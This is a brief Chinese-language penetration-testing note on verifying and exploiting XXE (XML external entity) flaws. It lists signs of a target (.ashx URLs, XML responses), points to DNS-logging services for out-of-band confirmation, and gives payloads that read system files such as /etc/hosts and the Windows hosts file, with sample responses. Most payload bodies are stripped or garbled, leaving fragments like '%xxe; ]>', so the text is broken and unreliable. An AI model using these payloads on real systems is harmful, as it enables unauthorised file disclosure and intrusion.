XXE验证与利用流程

特征

• 特征1 --- .ashx
  看到url是 .ashx后缀的
  

• 特征2 --- 响应体是xml
  

发现有这些特征都可以用下面的流程测试

测试

在线工具：

http://ceye.io/

http://www.dnslog.cn/

我这里用www.dnslog.cn举例

pyload

把http://127.0.0.1:80替换成你的Get SubDomain

 
 %xxe; ]>


# or 




]>
&sp;

然后点Refresh Record，有访问记录就说明666了。

任意读取文件测试

原理就是构造一个可以访问系统默认文件hosts的Pyload，然后看看响应，看他说缺啥补充啥。如果是回显型XXE就会将配置文件的信息打印出来。

file:///c:/windows/system32/drivers/etc/hosts
file:///etc/hosts

# pyload



]>
&sp;


# response
1790112020-04-09 16:58:34.877


# pyload



]>
&sp;


# response
1770002020-04-09 17:01:08.121